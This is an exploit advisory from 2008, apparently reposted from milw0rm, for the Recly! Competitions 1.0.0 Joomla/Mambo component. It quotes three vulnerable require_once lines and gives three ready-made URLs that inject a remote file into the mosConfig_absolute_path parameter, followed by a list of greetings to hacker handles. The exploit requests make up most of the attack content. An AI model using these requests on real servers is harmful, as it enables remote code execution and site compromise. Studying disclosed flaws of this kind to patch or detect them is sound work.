============================================================================================================================================================= [o] Recly!Competitions Component 1.0.0 Multiple Remote File Inclusion Vulnerability Software : com_competitions version 1.0.0 Vendor : http://www.recly.com/ Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=12 Author : NoGe Contact : noge[dot]code[at]gmail[dot]com Blog : http://evilc0de.blogspot.com ============================================================================================================================================================= [o] Vulnerable file administrator/components/com_competitions/includes/competitions/add.php require_once($GLOBALS['mosConfig_absolute_path'] . '/components/com_competitions/lib/common/GlobalVariables.class.php'); administrator/components/com_competitions/includes/competitions/competitions.php require_once( $GLOBALS['mosConfig_absolute_path'] . '/administrator/includes/pageNavigation.php' ); administrator/components/com_competitions/includes/settings/settings.php require_once($mosConfig_absolute_path.'/components/com_competitions/lib/common/String.class.php'); [o] Exploit http://localhost/[path]/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=[evilcode] http://localhost/[path]/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=[evilcode] http://localhost/[path]/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=[evilcode] ============================================================================================================================================================= [o] Greetz MainHack BrotherHood [ http://serverisdown.org/blog/] Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa H312Y yooogy mousekill }^-^{ kaka11 martfella skulmatic olibekas ulga Cungkee k1tk4t str0ke ============================================================================================================================================================= # milw0rm.com [2008-11-07]